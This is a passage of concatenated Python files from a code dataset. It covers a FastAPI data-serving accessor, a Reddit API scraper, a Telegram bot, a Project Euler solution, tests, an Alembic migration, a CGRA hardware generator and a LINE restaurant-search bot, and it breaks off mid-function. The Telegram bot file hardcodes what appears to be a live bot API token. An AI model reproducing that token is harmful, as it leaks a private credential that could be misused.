If None, the default routers will be included.\n The items of the list may also be tuples with the following format:\n ``[(router1, {'prefix': '/foo', 'tags': ['foo', 'bar']})]``.\n The 1st tuple element is a :class:`fastapi.APIRouter` instance and the\n 2nd element is a dictionary that is used to pass keyword arguments to\n :meth:`fastapi.FastAPI.include_router`.\n cache_kws : dict, optional\n Dictionary of keyword arguments to be passed to\n :meth:`cachey.Cache.__init__()`.\n app_kws : dict, optional\n Dictionary of keyword arguments to be passed to\n :meth:`fastapi.FastAPI.__init__()`.\n\n Notes\n -----\n This method can only be invoked once.\n\n \"\"\"\n if self._initialized:\n raise RuntimeError('This accessor has already been initialized')\n self._initialized = True\n\n if routers is not None:\n self._app_routers = normalize_app_routers(routers)\n check_route_conflicts(self._app_routers)\n if app_kws is not None:\n self._app_kws.update(app_kws)\n if cache_kws is not None:\n self._cache_kws.update(cache_kws)\n\n return self\n\n @property\n def cache(self) -> cachey.Cache:\n \"\"\"Returns the :class:`cachey.Cache` instance used by the FastAPI application.\"\"\"\n\n if self._cache is None:\n self._cache = cachey.Cache(**self._cache_kws)\n return self._cache\n\n def _init_app(self):\n \"\"\"Initiate the FastAPI application.\"\"\"\n\n self._app = FastAPI(**self._app_kws)\n\n for rt, kwargs in self._app_routers:\n self._app.include_router(rt, **kwargs)\n\n self._app.dependency_overrides[get_dataset] = lambda: self._obj\n self._app.dependency_overrides[get_cache] = lambda: self.cache\n\n return self._app\n\n @property\n def app(self) -> FastAPI:\n \"\"\"Returns the :class:`fastapi.FastAPI` application instance.\"\"\"\n if self._app is None:\n self._app = self._init_app()\n return self._app\n\n def serve(self, host='0.0.0.0', port=9000, log_level='debug', **kwargs):\n \"\"\"Serve this FastAPI application via :func:`uvicorn.run`.\n\n Parameters\n ----------\n host : str\n Bind socket to this host.\n port : int\n Bind socket to this port.\n log_level : str\n App logging level, valid options are\n {'critical', 'error', 'warning', 'info', 'debug', 'trace'}.\n kwargs :\n Additional arguments to be passed to :func:`uvicorn.run`.\n\n Notes\n -----\n This method is blocking and does not return.\n\n \"\"\"\n uvicorn.run(self.app, host=host, port=port, log_level=log_level, **kwargs)\n","sub_path":"xpublish/rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":4157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"530333593","text":"#!/usr/bin/python3\n\"\"\" Using Reddit API \"\"\"\n\nimport requests\n\n\ndef recurse(subreddit, hot_list=[], after=''):\n \"\"\"Function that queries Reddit API and returns a list\n containing the titles of all hot articles for a given subreddit\"\"\"\n\n header = {'user-agent': 'Sorec21'}\n param = {'after': after}\n url = 'https://www.reddit.com/r/{}/hot.json?after={}'.format(\n subreddit,\n after\n )\n req = requests.get(\n url,\n headers=header,\n allow_redirects=False\n )\n\n if req.status_code == 200:\n hot_list += req.json().get(\"data\", {}).get(\"children\", [])\n after_aux = req.json().get(\"data\", {}).get(\"after\", None)\n\n if after_aux:\n return recurse(subreddit, hot_list=hot_list, after=after_aux)\n else:\n return 
hot_list\n","sub_path":"0x16-api_advanced/2-recurse.py","file_name":"2-recurse.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"152102360","text":"import botogram\nbot = botogram.create(\"229216221:AAHMONo23pwOrfJjK2fGWUwcR-Oaigs9uWc\")\n\n@bot.command(\"hello\")\ndef hello_command(chat, message, args):\n    \"\"\"Say hello to the world!\"\"\"\n    chat.send(\"Hello world\")\n\nif __name__ == \"__main__\":\n    bot.run()","sub_path":"NotPatBot.py","file_name":"NotPatBot.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"300486930","text":"#!/usr/bin/env python3\n\n'''Starting in the top left corner of a 2×2 grid, and only being able to move to the right and down, there are exactly 6 routes to the bottom right corner.\n\nHow many such routes are there through a 20×20 grid?'''\n\nif __name__ == '__main__' :\n    # initialize grid\n    grid = list()\n    for i in range(20) :\n        grid.append([0]*20)\n\n\n\n    for i in range(20) :\n        grid[0][i] = i + 2\n        grid[i][0] = i + 2\n\n    for y in range(1,20) :\n        for x in range(1,20) :\n            grid[y][x] = grid[y-1][x] + grid[y][x-1]\n\n    print(grid[-1][-1])\n    \n","sub_path":"python/p15.py","file_name":"p15.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"345817496","text":"import os\nimport sys\nfrom train_CNN import fit_model\nfrom utils.UCF_utils import get_data_list\nfrom models.temporal_CNN import temporal_CNN\n\nN_CLASSES=101\nif __name__ == '__main__':\n    dataset = 'ucf'\n    if len(sys.argv) > 1:\n        dataset = sys.argv[1]\n    cwd = os.getcwd()\n    data_dir = os.path.join(cwd,'data')\n    if 'hmdb' in dataset.lower():\n        list_dir = os.path.join(data_dir,'hmdb51_test_train_splits')\n    else:\n        list_dir = os.path.join(data_dir,'ucfTrainTestlist')\n    \n    weights_dir = os.path.join(cwd,'models')\n    old_weights_dir = os.path.join(weights_dir, 'temporal_cnn_42.h5')\n    new_weights_dir = os.path.join(weights_dir, 'temporal_cnn_43.h5')\n    video_dir = os.path.join(data_dir, 'OF_data')\n    train_data, test_data, class_index = get_data_list(list_dir, video_dir)\n    input_shape = (216, 216, 18)\n    model = temporal_CNN(input_shape, N_CLASSES, new_weights_dir, include_top=True)\n    fit_model(model, train_data, test_data, new_weights_dir, input_shape, optical_flow=True)\n\n","sub_path":"train_CNN_of.py","file_name":"train_CNN_of.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"312044877","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Test feature plotting.\"\"\"\n\n#------------------------------------------------------------------------------\n# Imports\n#------------------------------------------------------------------------------\n\nimport numpy as np\n\nfrom ...utils.logging import set_level\nfrom ..features import FeatureView\nfrom ...utils._color import _random_color\nfrom ...io.mock.artificial import (artificial_features,\n                                   artificial_masks,\n                                   artificial_spike_clusters,\n                                   artificial_spike_samples)\nfrom ...utils.testing import show_test\n\n\n#------------------------------------------------------------------------------\n# Fixtures\n#------------------------------------------------------------------------------\n\ndef setup():\n    set_level('debug')\n\n\ndef teardown():\n 
pass\n\n\n#------------------------------------------------------------------------------\n# Tests\n#------------------------------------------------------------------------------\n\ndef _test_features(n_spikes=None, n_clusters=None):\n n_channels = 32\n n_features = 3\n\n features = artificial_features(n_spikes, n_channels, n_features)\n masks = artificial_masks(n_spikes, n_channels)\n spike_clusters = artificial_spike_clusters(n_spikes, n_clusters)\n spike_samples = artificial_spike_samples(n_spikes).astype(np.float32)\n\n c = FeatureView()\n c.visual.features = features\n # Useful to test depth.\n # masks[n_spikes//2:, ...] = 0\n c.visual.masks = masks\n c.dimensions = ['time', (0, 0), (1, 0), (2, 0)]\n c.visual.spike_clusters = spike_clusters\n c.visual.spike_samples = spike_samples\n c.visual.cluster_colors = np.array([_random_color()\n for _ in range(n_clusters)])\n\n show_test(c)\n\n\ndef test_features_empty():\n _test_features(n_spikes=0, n_clusters=0)\n\n\ndef test_features_full():\n _test_features(n_spikes=100, n_clusters=3)\n","sub_path":"phy/plot/tests/test_features.py","file_name":"test_features.py","file_ext":"py","file_size_in_byte":1974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"355401834","text":"from __future__ import annotations\n\nimport yul.yul_ast as ast\nfrom yul.AstMapper import AstMapper\nfrom yul.call_graph import build_callgraph, CallGraph\n\n\nclass FunctionPruner(AstMapper):\n def __init__(self, public_functions: list[str]):\n super().__init__()\n self.public_functions: frozenset[str] = frozenset(public_functions)\n self.callgraph: CallGraph = {}\n self.visited_functions: set[str] = set()\n\n def map(self, node: ast.Node, *args, **kwargs) -> ast.Node:\n if not isinstance(node, ast.Block):\n return self.visit(node, *args, **kwargs)\n\n self.callgraph = build_callgraph(node)\n for function in self.callgraph:\n f_name = function.name\n if f_name in self.public_functions or f_name == \"fun_ENTRY_POINT\":\n self._dfs(function)\n\n return self.visit(node, *args, **kwargs)\n\n def visit_block(self, node: ast.Block):\n statements = []\n for stmt in node.statements:\n if self._is_unused_function(stmt):\n continue\n statements.append(self.visit(stmt))\n\n return ast.Block(statements=tuple(statements))\n\n def _dfs(self, function: ast.FunctionDefinition):\n if function.name in self.visited_functions:\n return\n\n self.visited_functions.add(function.name)\n for f in self.callgraph[function]:\n self._dfs(f)\n\n def _is_unused_function(self, node):\n return (\n isinstance(node, ast.FunctionDefinition)\n and node.name not in self.visited_functions\n )\n","sub_path":"warp/yul/FunctionPruner.py","file_name":"FunctionPruner.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"570302664","text":"\"\"\"empty message\n\nRevision ID: d6461826e9df\nRevises: cb332e155c93\nCreate Date: 2018-05-27 08:44:23.852942\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd6461826e9df'\ndown_revision = 'cb332e155c93'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.add_column('user', sa.Column('name', sa.String(length=64), nullable=True))\n op.add_column('user', sa.Column('surname', sa.String(length=64), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('user', 'surname')\n op.drop_column('user', 'name')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/d6461826e9df_.py","file_name":"d6461826e9df_.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"522402189","text":"#!/usr/bin/env python:\n\n# %% Necessary packages\n# GPU node choice\nimport sys, ast, os\nimport time\nimport scanpy as sc\nimport numpy as np\n\nsys.path.append(os.getcwd())\nfrom INVASE import KeyTF\n\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\n# The GPU id to use, usually either \"0\" or \"1\";\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"6\"\n\n'''\npipenv shell\ncd PycharmProject/INVASE/\n\npython3 main/run_file.py \"['CD4', 'CD8A', 'CD8B', 'CD19', 'CTLA4', 'TIGIT', 'GNG4', 'GNG8', 'CDK1']\" 2> log/log18092019.txt\n'''\n\n#exec(open('INVASE.py').read())\n# selected_gene check:\n# 'ZBTB16' in TF_list_total\n\nif __name__ == '__main__':\n arg = ast.literal_eval(sys.argv[1])\n target_Genes = arg\n selected_celltype = None\n # selected_celltype = arg[1] #['CD4+T', 'CD4+Tmem', 'CD8+T', 'CD8+Tmem', 'B_mature']\n\n assert isinstance(target_Genes, list)\n # assert isinstance(selected_celltype, list)\n\n print('target gene selected: %s' % (target_Genes))\n # print('cell type selected: %s' % (selected_celltype))\n # %% Data loading\n print(\"data loading\")\n DATAFILE = '../data/thymus/'\n # save_path = DATAFILE + \"A42.v01.yadult_raw.h5ad\"\n save_path = DATAFILE + \"HTA07.A04.v01.adata_fig1.h5ad\"\n\n adataset = sc.read_h5ad(save_path)\n print ('data is loaded')\n\n assert sum(adataset.raw.var.GeneName.isin(target_Genes)) == len(target_Genes)\n\n TF_list_total = np.loadtxt('main/TF_names.txt', dtype='str').tolist()\n\n #print(\"%d out of %d genes are selected highly variable genes\" % (\n # adataset.var.GeneName.size, adataset.raw.var.GeneName.size))\n\n\n\n # %% run INVASE model\n try1 = KeyTF(adataset = adataset, target_Genes = target_Genes, TF_list_total = TF_list_total, raw_counts = True)\n try1.filter_matrix()\n for gene in range(len(target_Genes)):\n t0 = time.time()\n PVS_Alg = try1.implement_invase(gene=gene)\n\n t = (time.time() - t0)/60\n save_name = 'all_cells' + '@' + target_Genes[gene]\n #save_name = '|'.join(selected_celltype) + '@' + gene\n\n model = PVS_Alg.generator\n model.name = dict(selected_celltype = selected_celltype, target_Gene = gene, time_spend = t)\n\n\n model_json = model.to_json()\n with open(\"results/generator_%s.json\" % save_name, \"w\") as json_file:\n json_file.write(model_json)\n model.save_weights(\"results/weights_%s.h5\" % save_name)\n print(\"Saved model: %s\" % save_name)\n print('cell type selected: %s' % ('all cells'))\n print('target gene selected: %s' % (target_Genes[gene]))\n print('Time spent: %.2f minutes' % t)","sub_path":"main/run_file.py","file_name":"run_file.py","file_ext":"py","file_size_in_byte":2578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"506498676","text":"import argparse\nimport magma\nimport coreir\nfrom canal.util import IOSide\nfrom gemstone.common.configurable import ConfigurationType\nfrom gemstone.common.jtag_type import 
JTAGType\nfrom gemstone.generator.generator import Generator\nfrom global_controller.global_controller_magma import GlobalController\nfrom global_controller.global_controller_wire_signal import\\\n glc_interconnect_wiring\nfrom global_buffer.io_placement import place_io_blk\nfrom global_buffer.global_buffer_magma import GlobalBuffer\nfrom global_buffer.global_buffer_wire_signal import glb_glc_wiring, \\\n glb_interconnect_wiring\nfrom global_buffer.soc_data_type import SoCDataType\nfrom global_controller.axi4_type import AXI4SlaveType\nfrom canal.global_signal import GlobalSignalWiring\nfrom lassen.sim import gen_pe\nfrom cgra import create_cgra\nimport metamapper\nimport subprocess\nimport os\nimport math\nimport archipelago\nimport json\nfrom lassen import rules as lassen_rewrite_rules\nfrom lassen import LassenMapper\n\nfrom io_core.io_core_magma import IOCore\nfrom peak_core.peak_core import PeakCore\n\n\nclass Garnet(Generator):\n def __init__(self, width, height, add_pd, interconnect_only: bool = False,\n use_sram_stub: bool = True):\n super().__init__()\n\n # configuration parameters\n config_addr_width = 32\n config_data_width = 32\n axi_addr_width = 12\n tile_id_width = 16\n config_addr_reg_width = 8\n num_tracks = 5\n\n # size\n self.width = width\n self.height = height\n\n # only north side has IO\n io_side = IOSide.North\n\n # global buffer parameters\n num_banks = 32\n bank_addr_width = 17\n bank_data_width = 64\n glb_addr_width = 32\n\n # parallel configuration parameter\n num_parallel_cfg = math.ceil(width / 4)\n\n # number of input/output channels parameter\n num_io = math.ceil(width / 4)\n\n if not interconnect_only:\n wiring = GlobalSignalWiring.ParallelMeso\n self.global_controller = GlobalController(config_addr_width,\n config_data_width,\n axi_addr_width)\n\n self.global_buffer = GlobalBuffer(num_banks=num_banks,\n num_io=num_io,\n num_cfg=num_parallel_cfg,\n bank_addr_width=bank_addr_width,\n glb_addr_width=glb_addr_width,\n cfg_addr_width=config_addr_width,\n cfg_data_width=config_data_width,\n axi_addr_width=axi_addr_width)\n else:\n wiring = GlobalSignalWiring.Meso\n\n interconnect = create_cgra(width, height, io_side,\n reg_addr_width=config_addr_reg_width,\n config_data_width=config_data_width,\n tile_id_width=tile_id_width,\n num_tracks=num_tracks,\n add_pd=add_pd,\n use_sram_stub=use_sram_stub,\n global_signal_wiring=wiring,\n num_parallel_config=num_parallel_cfg,\n mem_ratio=(1, 4))\n\n self.interconnect = interconnect\n\n if not interconnect_only:\n self.add_ports(\n jtag=JTAGType,\n clk_in=magma.In(magma.Clock),\n reset_in=magma.In(magma.AsyncReset),\n soc_data=SoCDataType(glb_addr_width, bank_data_width),\n axi4_ctrl=AXI4SlaveType(axi_addr_width, config_data_width),\n cgra_running_clk_out=magma.Out(magma.Clock),\n )\n\n # top <-> global controller ports connection\n self.wire(self.ports.clk_in, self.global_controller.ports.clk_in)\n self.wire(self.ports.reset_in,\n self.global_controller.ports.reset_in)\n self.wire(self.ports.jtag, self.global_controller.ports.jtag)\n self.wire(self.ports.axi4_ctrl,\n self.global_controller.ports.axi4_ctrl)\n self.wire(self.ports.cgra_running_clk_out,\n self.global_controller.ports.clk_out)\n\n # top <-> global buffer ports connection\n self.wire(self.ports.soc_data, self.global_buffer.ports.soc_data)\n glc_interconnect_wiring(self)\n glb_glc_wiring(self)\n glb_interconnect_wiring(self, width, num_parallel_cfg)\n else:\n # lift all the interconnect ports up\n self._lift_interconnect_ports(config_data_width)\n\n 
self.mapper_initalized = False\n self.__rewrite_rules = None\n\n def _lift_interconnect_ports(self, config_data_width):\n for name in self.interconnect.interface():\n self.add_port(name, self.interconnect.ports[name].type())\n self.wire(self.ports[name], self.interconnect.ports[name])\n self.add_ports(\n clk=magma.In(magma.Clock),\n reset=magma.In(magma.AsyncReset),\n config=magma.In(\n ConfigurationType(self.interconnect.config_data_width,\n self.interconnect.config_data_width)),\n stall=magma.In(\n magma.Bits[self.interconnect.stall_signal_width]),\n read_config_data=magma.Out(magma.Bits[config_data_width])\n )\n self.wire(self.ports.clk, self.interconnect.ports.clk)\n self.wire(self.ports.reset, self.interconnect.ports.reset)\n self.wire(self.ports.config,\n self.interconnect.ports.config)\n self.wire(self.ports.stall,\n self.interconnect.ports.stall)\n self.wire(self.interconnect.ports.read_config_data,\n self.ports.read_config_data)\n\n def set_rewrite_rules(self,rewrite_rules):\n self.__rewrite_rules = rewrite_rules\n\n def initialize_mapper(self, rewrite_rules=None,discover=False):\n if self.mapper_initalized:\n raise RuntimeError(\"Can not initialize mapper twice\")\n # Set up compiler and mapper.\n self.coreir_context = coreir.Context()\n\n #Initializes with all the custom rewrite rules\n self.mapper = LassenMapper(self.coreir_context)\n\n # Either load rewrite rules from cached file or generate them by\n # discovery.\n if rewrite_rules:\n with open(rewrite_rules) as jfile:\n rules = json.load(jfile)\n for rule in rules:\n self.mapper.add_rr_from_description(rule)\n elif discover:\n # Hack to speed up rewrite rules discovery.\n bypass_mode = lambda inst: (\n inst.rega == type(inst.rega).BYPASS and\n inst.regb == type(inst.regb).BYPASS and\n inst.regd == type(inst.regd).BYPASS and\n inst.rege == type(inst.rege).BYPASS and\n inst.regf == type(inst.regf).BYPASS\n )\n self.mapper.add_discover_constraint(bypass_mode)\n self.mapper.discover_peak_rewrite_rules(width=16)\n else:\n for rule in lassen_rewrite_rules:\n self.mapper.add_rr_from_description(rule)\n\n self.mapper_initalized = True\n\n def map(self, halide_src):\n assert self.mapper_initalized\n app = self.coreir_context.load_from_file(halide_src)\n self.mapper.map_app(app)\n instrs = self.mapper.extract_instr_map(app)\n return app, instrs\n\n def run_pnr(self, info_file, mapped_file):\n cgra_path = os.getenv(\"CGRA_PNR\", \"\")\n assert cgra_path != \"\", \"Cannot find CGRA PnR\"\n entry_point = os.path.join(cgra_path, \"scripts\", \"pnr_flow.sh\")\n subprocess.check_call([entry_point, info_file, mapped_file])\n\n def get_placement_bitstream(self, placement, id_to_name, instrs):\n result = []\n for node, (x, y) in placement.items():\n instance = id_to_name[node]\n if instance not in instrs:\n continue\n instr = instrs[instance]\n result += self.interconnect.configure_placement(x, y, instr)\n return result\n\n @staticmethod\n def __instance_to_int(mod: coreir.module.Module):\n top_def = mod.definition\n result = {}\n instances = {}\n\n for instance in top_def.instances:\n instance_name = instance.name\n assert instance_name not in result\n result[instance_name] = str(len(result))\n instances[instance_name] = instance\n return result, instances\n\n def __get_available_cores(self):\n result = {}\n for tile in self.interconnect.tile_circuits.values():\n core = tile.core\n tags = core.pnr_info()\n if not isinstance(tags, list):\n tags = [tags]\n for tag in tags:\n if tag.tag_name not in result:\n result[tag.tag_name] = tag, core\n 
return result\n\n def convert_mapped_to_netlist(self, mapped):\n instance_id, instances = self.__instance_to_int(mapped)\n core_tags = self.__get_available_cores()\n name_to_id = {}\n module_name_to_tag = {}\n netlist = {}\n bus = {}\n # map instances to tags\n for instance_name, instance in instances.items():\n module_name = instance.module.name\n if module_name == \"PE\":\n # it's a PE core\n # FIXME: because generators are not hashable, we can't reverse\n # index table search the tags\n # after @perf branch is merged into master, we need to\n # refactor the following code\n if module_name not in module_name_to_tag:\n instance_tag = \"\"\n for tag_name, (tag, core) in core_tags.items():\n if isinstance(core, PeakCore):\n instance_tag = tag_name\n break\n assert instance_tag != \"\", \"Cannot find the core\"\n module_name_to_tag[module_name] = instance_tag\n elif instance.module.name == \"io16\":\n # it's an IO core\n if module_name not in module_name_to_tag:\n instance_tag = \"\"\n for tag_name, (tag, core) in core_tags.items():\n if isinstance(core, IOCore):\n instance_tag = tag_name\n break\n assert instance_tag != \"\", \"Cannot find the core\"\n module_name_to_tag[module_name] = instance_tag\n else:\n raise ValueError(f\"Cannot find CGRA core for {module_name}. \"\n f\"Is the mapper working?\")\n\n name_to_id[instance_name] = module_name_to_tag[module_name] + \\\n instance_id[instance_name]\n # get connections\n src_to_net_id = {}\n for conn in mapped.directed_module.connections:\n assert len(conn.source) == 2\n assert len(conn.sink) == 2\n src_name, src_port = conn.source\n dst_name, dst_port = conn.sink\n src_id = name_to_id[src_name]\n dst_id = name_to_id[dst_name]\n if (src_name, src_port) not in src_to_net_id:\n net_id = \"e\" + str(len(netlist))\n netlist[net_id] = [(src_id, src_port)]\n src_to_net_id[(src_name, src_port)] = net_id\n else:\n net_id = src_to_net_id[(src_name, src_port)]\n netlist[net_id].append((dst_id, dst_port))\n # get bus width\n src_instance = instances[src_name]\n width = src_instance.select(src_port).type.size\n if net_id in bus:\n assert bus[net_id] == width\n else:\n bus[net_id] = width\n\n id_to_name = {}\n for name, id in name_to_id.items():\n id_to_name[id] = name\n return netlist, bus, id_to_name\n\n @staticmethod\n def get_input_output(netlist):\n inputs = []\n outputs = []\n for _, net in netlist.items():\n for blk_id, port in net:\n if port == \"io2f_16\":\n inputs.append(blk_id)\n elif port == \"f2io_16\":\n outputs.append(blk_id)\n elif port == \"io2f_1\":\n inputs.append(blk_id)\n elif port == \"f2io_1\":\n outputs.append(blk_id)\n return inputs, outputs\n\n def get_io_interface(self, inputs, outputs, placement, id_to_name):\n input_interface = []\n output_interface = []\n reset_port_name = \"\"\n valid_port_name = \"\"\n\n for blk_id in inputs:\n x, y = placement[blk_id]\n bit_width = 16 if blk_id[0] == \"I\" else 1\n name = f\"glb2io_{bit_width}_X{x:02X}_Y{y:02X}\"\n input_interface.append(name)\n assert name in self.interconnect.interface()\n blk_name = id_to_name[blk_id]\n if \"reset\" in blk_name:\n reset_port_name = name\n for blk_id in outputs:\n x, y = placement[blk_id]\n bit_width = 16 if blk_id[0] == \"I\" else 1\n name = f\"io2glb_{bit_width}_X{x:02X}_Y{y:02X}\"\n output_interface.append(name)\n assert name in self.interconnect.interface()\n blk_name = id_to_name[blk_id]\n if \"valid\" in blk_name:\n valid_port_name = name\n return input_interface, output_interface,\\\n (reset_port_name, valid_port_name)\n\n def compile(self, 
halide_src):\n if not self.mapper_initalized:\n self.initialize_mapper(self.__rewrite_rules)\n mapped, instrs = self.map(halide_src)\n # id to name converts the id to instance name\n netlist, bus, id_to_name = self.convert_mapped_to_netlist(mapped)\n fixed_io = place_io_blk(id_to_name, self.width)\n placement, routing = archipelago.pnr(self.interconnect, (netlist, bus),\n cwd=\"temp\",\n id_to_name=id_to_name,\n fixed_pos=fixed_io)\n bitstream = []\n bitstream += self.interconnect.get_route_bitstream(routing)\n bitstream += self.get_placement_bitstream(placement, id_to_name,\n instrs)\n inputs, outputs = self.get_input_output(netlist)\n input_interface, output_interface, \\\n (reset, valid) = self.get_io_interface(inputs,\n outputs,\n placement,\n id_to_name)\n return bitstream, (input_interface, output_interface, reset, valid)\n\n def create_stub(self):\n result = \"\"\"\nmodule Garnet (\n input clk,\n input [31:0] config_config_addr,\n input [31:0] config_config_data,\n input [0:0] config_read,\n input [0:0] config_write,\n output [31:0] read_config_data,\n input reset,\n input [3:0] stall,\n\"\"\"\n # loop through the interfaces\n ports = []\n for port_name, port_node in self.interconnect.interface().items():\n io = \"output\" if \"io2glb\" in port_name else \"input\"\n ports.append(f\" {io} [{port_node.width - 1}:0] {port_name}\")\n result += \",\\n\".join(ports)\n result += \"\\n);\\nendmodule\\n\"\n with open(\"garnet_stub.v\", \"w+\") as f:\n f.write(result)\n\n def name(self):\n return \"Garnet\"\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Garnet CGRA')\n parser.add_argument('--width', type=int, default=4)\n parser.add_argument('--height', type=int, default=2)\n parser.add_argument(\"--input-app\", type=str, default=\"\", dest=\"app\")\n parser.add_argument(\"--input-file\", type=str, default=\"\", dest=\"input\")\n parser.add_argument(\"--output-file\", type=str, default=\"\", dest=\"output\")\n parser.add_argument(\"--gold-file\", type=str, default=\"\",\n dest=\"gold\")\n parser.add_argument(\"-v\", \"--verilog\", action=\"store_true\")\n parser.add_argument(\"--no-pd\", \"--no-power-domain\", action=\"store_true\")\n parser.add_argument(\"--rewrite-rules\", type=str, default=\"\")\n parser.add_argument(\"--interconnect-only\", action=\"store_true\")\n parser.add_argument(\"--no_sram_stub\", action=\"store_true\")\n args = parser.parse_args()\n\n if not args.interconnect_only:\n assert args.width % 4 == 0 and args.width >= 4\n garnet = Garnet(width=args.width, height=args.height,\n add_pd=not args.no_pd,\n interconnect_only=args.interconnect_only,\n use_sram_stub=not args.no_sram_stub)\n\n if args.rewrite_rules:\n garnet.set_rewrite_rules(args.rewrite_rules)\n\n if args.verilog:\n garnet_circ = garnet.circuit()\n magma.compile(\"garnet\", garnet_circ, output=\"coreir-verilog\",\n coreir_libs={\"float_DW\"})\n garnet.create_stub()\n\n if len(args.app) > 0 and len(args.output) > 0:\n # do PnR and produce bitstream\n bitstream, (inputs, outputs, reset, valid) = garnet.compile(args.app)\n with open(args.output, \"w+\") as f:\n bs = [\"{0:08X} {1:08X}\".format(entry[0], entry[1]) for entry\n in bitstream]\n f.write(\"\\n\".join(bs))\n\n # if input and gold is provided\n if len(args.input) > 0 and len(args.gold) > 0:\n # if we want to compare, write out the test configuration as well\n # write out the config file\n if len(inputs) > 1:\n inputs.remove(reset)\n assert len(inputs) == 1\n if len(outputs) > 1:\n outputs.remove(valid)\n assert len(outputs) == 1\n config 
= {\n                \"input_filename\": args.input,\n                \"bitstream\": args.output,\n                \"gold_filename\": args.gold,\n                \"output_port_name\": outputs[0],\n                \"input_port_name\": inputs[0],\n                \"valid_port_name\": valid,\n                \"reset_port_name\": reset\n            }\n            with open(f\"{args.output}.json\", \"w+\") as f:\n                json.dump(config, f)\n\n\nif __name__ == \"__main__\":\n    main()\n\n","sub_path":"garnet.py","file_name":"garnet.py","file_ext":"py","file_size_in_byte":18741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"569092225","text":"# coding=utf-8\nimport numpy as np\nimport sys\nsys.path.insert(0, \"../imp/\")\nimport NeuNet  # noqa: E402\nimport plott\n\ngraph = plott.Plott(\"../wrt/NeuNetNorm/fitness_timeline.html\",\n                    a_title=\"fitness timeline\",\n                    a_x_label=\"fitness\",\n                    a_y_label=\"time\")\nlines = [line.rstrip('\\n') for line in open(\"../wrt/NeuNetNorm/key_data.txt\")]\nneurons_per_layer = str(lines[0])[21:len(lines[0])-1]\nlayer = str(lines[2])[9:len(lines[2])-1]\n\nNeuNet = NeuNet.NeuNet(\"../wrt/NeuNetNorm/NeuNetGOOG.csv\", \"../wrt/NeuNetNorm/NeuNetHistory.csv\",\n                       layer, neurons_per_layer, 2)\nNeuNet.read()\n\ny = NeuNet.fitnessHistory\n\ngraph.add_graph(y,\n                alpha=1,\n                mode=\"line\",\n                legend=\"fitness\",\n                colour=\"blue\",\n                width=3)\ngraph.save_plott(mode=\"show\")\n","sub_path":"tst/fitness_timeline.py","file_name":"fitness_timeline.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"241226269","text":"from flask import Flask, request, abort,render_template\nimport os,json\nimport subprocess\nimport requests\nfrom bs4 import BeautifulSoup\nfrom linebot import (\n    LineBotApi, WebhookHandler\n)\nfrom linebot.exceptions import (\n    InvalidSignatureError\n)\nfrom linebot.models import (\n    MessageEvent, TextMessage, TextSendMessage,\n    BeaconEvent,QuickReply,QuickReplyButton,\n    TemplateSendMessage,ButtonsTemplate,\n    CarouselTemplate,CarouselColumn,PostbackEvent,MessageAction,LocationMessage,\n    PostbackAction,URIAction,LocationAction,ImageMessage,ImageSendMessage\n)\n\napp = Flask(__name__)\n\n#環境変数取得\nYOUR_CHANNEL_ACCESS_TOKEN = os.environ[\"YOUR_CHANNEL_ACCESS_TOKEN\"]\nYOUR_CHANNEL_SECRET = os.environ[\"YOUR_CHANNEL_SECRET\"]\nYOUR_API_KEYID=os.environ['YOUR_API_KEYID']\n\nline_bot_api = LineBotApi(YOUR_CHANNEL_ACCESS_TOKEN)\nhandler = WebhookHandler(YOUR_CHANNEL_SECRET)\n\nwanna_eat='たこ焼き'\n\n#データを取得して、URLを返還する。その後、\n\n\n#食べ物の情報をとってくる函数(ぐるなびAPI)\n#引数   fName:食べ物の名前\n#     fLat :現在地の緯度\n#     fLon :現在地の経度\n#return値 レストラン情報\ndef getFoodsInfo(fName,fLat,fLon):\n    url = \"https://api.gnavi.co.jp/RestSearchAPI/v3/\"\n\n    params={}\n    params[\"keyid\"] = YOUR_API_KEYID\n    params[\"freeword\"] = fName\n    params[\"latitude\"] = fLat\n    params[\"longitude\"] = fLon\n\n    #range=検索範囲の半径の大きさ(1~5) 10件以上見つかる最小の大きさを求める\n    for i in range(1,6):\n        params[\"range\"] = i\n        result = requests.get(url, params)\n        if(countHit(result.json())>=10):\n            break\n\n    print(\"range:%d\" % i)\n    return result.json() \n\n#ヒット件数を求める函数.レスポンスがエラー時の処理も行う.\n#引数   restInfo:ぐるなびAPIが返したレストラン情報\n#return値 ヒット件数\ndef countHit(restInfo): \n    return restInfo.get('total_hit_count', 0)\n\n#取得結果を表示する\n#引数   restInfo:ぐるなびAPIが返したレストラン情報\n#return値 住所リストと店名リスト\n\ndef 